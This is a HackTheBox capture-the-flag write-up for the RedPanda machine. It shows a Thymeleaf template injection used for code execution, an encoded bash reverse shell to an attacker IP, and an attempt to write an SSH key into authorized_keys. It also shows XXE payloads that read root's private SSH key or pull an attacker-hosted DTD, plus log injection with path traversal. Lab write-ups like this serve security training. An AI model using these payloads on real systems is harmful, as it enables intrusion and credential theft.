CTF-Writeups/HackTheBox/RedPanda.md

HackTheBox - RedPanda

NMAP

Nmap scan report for 10.10.11.170
Host is up (0.089s latency).   
Not shown: 65533 closed ports      
PORT     STATE SERVICE    VERSION     
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)        
8080/tcp open  http-proxy
| fingerprint-strings:                  
|   GetRequest:            
|     HTTP/1.1 200                     
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sat, 09 Jul 2022 19:01:58 GMT     
|     Connection: close     
|     <!DOCTYPE html>              
snip..
|_    Request</h1></body></html>       
| http-methods:                    
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Red Panda Search | Made with Spring Boot

PORT 8080 (HTTP)

On port 8080 we see an animation of a fox having a search bar and the title bar tells us that it's made on Spring Boot which is a java web framework

I tried some stuff like putting a single quote ' to see if there's sqli or some command injection

Fuzzing for files with gobuster we find an endpoint /stats

This shows two potential usernames damian and woodenk, clicking on either one of them will show us an option to export table and a GET parameter author

I tried fuzzing for LFI through a payload list which failed as well

On clicking Export table it downloads an xml file

Foothold

But we can't really change the contents of xml so there's no chance ofXXE, testing for SSTI it was vulnerable to Thymeleaf which is a template engine for spring boot, testing it with @{7*7]

https://javamana.com/2021/11/20211121071046977B.html

So we know that it's vulnerable to SSTI, let's try to get RCE and look for any payloads if there are

But this payload didn't worked and gave an error that there are banned characters

${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}

I tried different fragement exrpessions

And * this one worked with our payload

*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}

For getting a reverse shell I tried bunch of things, encoding the reverse shell with base64 and sending it off but I didn't get a connection back

*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("echo 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjM2LzIyMjIgMD4mMScK' | base64 -d | bash).getInputStream()).next()}

Also tried writing ssh key in authorized_keys file but it again gave an error for banned characters

*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTFEKz1yo3lIWUoYDguQRH534VSoRINR3uWUngQEauC0vIjJuppj2d4nRMMxVOtcQIWuvfYnDef6IbJEBqbyZZw2BOgGdh2Q41kSAKrfoqSbefa7lLtabS9Jt6lo+UY7uEoj6zTsQO4E+b895BNeBQUccfqnY1uyFjFptUR39msM5U8I1BoefbwbI5C7yrZULEZQwkoXKbc1/di/B5btMq2PIbO5f1Za7nwBkaVVv2skmSa0b8K6zkYdIbaaP3HAfkbDiJJXyEJQijqIAYW8CBhGW17KkXAAvmumKjYKFvfa/e5KobAgJT2zKd25Ycu8L8lH3JluyEE4ZHA4XvVSnRSbR4PTL2A6rjE+2bI1MRuF5KYiIMuU3enK7zgYkD2ed3xXgcfqMqPVlE73j6ykKT7mMmA0Pb7uKEHnqMXJFUueVcAso+lYrbvZyRX7hn7hEXOw4uum7lUtZp4iUYSsD/ogAslkvp2WpHRbMW+5rsi+lBAt09lb2aC38yO/jzAy0= arz@blaze' > /home/woodenk/.ssh/authorized_keys").getInputStream()).next()}

I searched around for ways to generate java runtime exec payloads and found an encoder for that

https://zgao.top/java-lang-runtime-exec-payload-encoding-tool/

*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjM2LzIyMjIgMD4mMSc=}|{base64,-d}|{bash,-i}").getInputStream()).next()}

Stabilizing the shell with python3

Since we are in logs group, I checked if this group has access anywhere

The reason we are in this group is because the panda search is application is being ran as woodenk as user and with logs group

Checked for sudo -l which was asking for a password

I transferred linpeas to enumerate the machine

It didn't find anything but pspy did find something running in background as root user

Privilege Escalation

In /opt , we can see a clean up script removing every jpg and xml files from every publicly writeable directory

We can check the source code of panda search MainController.java

In the source code we can see that it's looking for eitherdamian_creds.xml or woodenk_creds.xml in /credits and reading the contents

We can find the password of woodenk user here

But it was useless as we wouldn't be in the logs group also this file isn't important as the one which is running as root through cronjob is credit score /opt/credit-score/LogParser/final/src/main/java/com/logparser/App.java

First it's going to set arguments from the log file from which it can parse the values and seperate them with ||

In IsImage function it's going to check for a jpg image extension file , will come back to it later

From getArtist function it's going to read the meta data of the image specfically the name of Artisit of the image

The addViewTo is the function which is vulnerable to XXE because it's using jdom2 version 2.0.6.1 which can be verified from pom.xml which contains information about the project

Lastly the main function from which the code will start from which wiil read the uri part from the log file sperated by ||, it will check if there's a jpg image file in the uri, if there is , it's going to fetch the artist name of the image file and it's going to send the value to addviewto function which will check if the uri of the image is the similar the one present in the xml file

So to perform the XXE, first we need to make jpg image file point to an artist name and it could be any name so I'll be setting it to uwu but we don't have write permissions in the directory where the source code is running so we'll need to perform directory traversal to /home/woodenk

For the xml file we need to name it artist + creds.xml, so it's going to be uwu_creds.xml also we need to add the location of the image in uri and this needs to be the same as the one in the log file

Method 1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "file:///root/.ssh/id_rsa"> ]>
<credits>
  <author>damian</author>
  <image>  <uri>/../../../../../../../../../../home/woodenk/smooch.jpg</uri>
    <uwu>&example;</uwu>
    <views>0</views>
  </image>
  <totalviews>0</totalviews>
</credits>

Transfer both the image and xml file in wendook's home directory

Now to add the uri of this image file we'll perform a directory traversal from /clients as the path is hardcoded /opt/panda_search/src/main/resources/static + uri , here uri is our input where we'll perform directory traversal to our image file location /home/wendook/smooch.jpg

echo "200||10.10.14.36||Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0||/../../../../../../../../../../home/woodenk/smooch.jpg" > ./redpanda.log

After waiting for some time we'll see the root ssh key being reflected in uwu xml attribute which we set

Method 2

The second way is also with XXE but it's with blind SSRF which is also known as out of band XXE, through which we'll get the root flag by transferring an xml file having an entity to make a request to our server with the entity having the flag contents as a parameter being passed on to our hosted xml having the entities to load the contents

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://IP/uwu.dtd"> %xxe;]>
<credits>
  <author>&xxe;</author>
</credits>

We'll transfer this on the target machine

And host this xml file on our python server

References

• https://javamana.com/2021/11/20211121071046977B.html
• https://zgao.top/java-lang-runtime-exec-payload-encoding-tool/
• https://r0yanx.com/tools/java_exec_encode/
• https://security.snyk.io/vuln/SNYK-JAVA-ORGJDOM-1309669
• https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity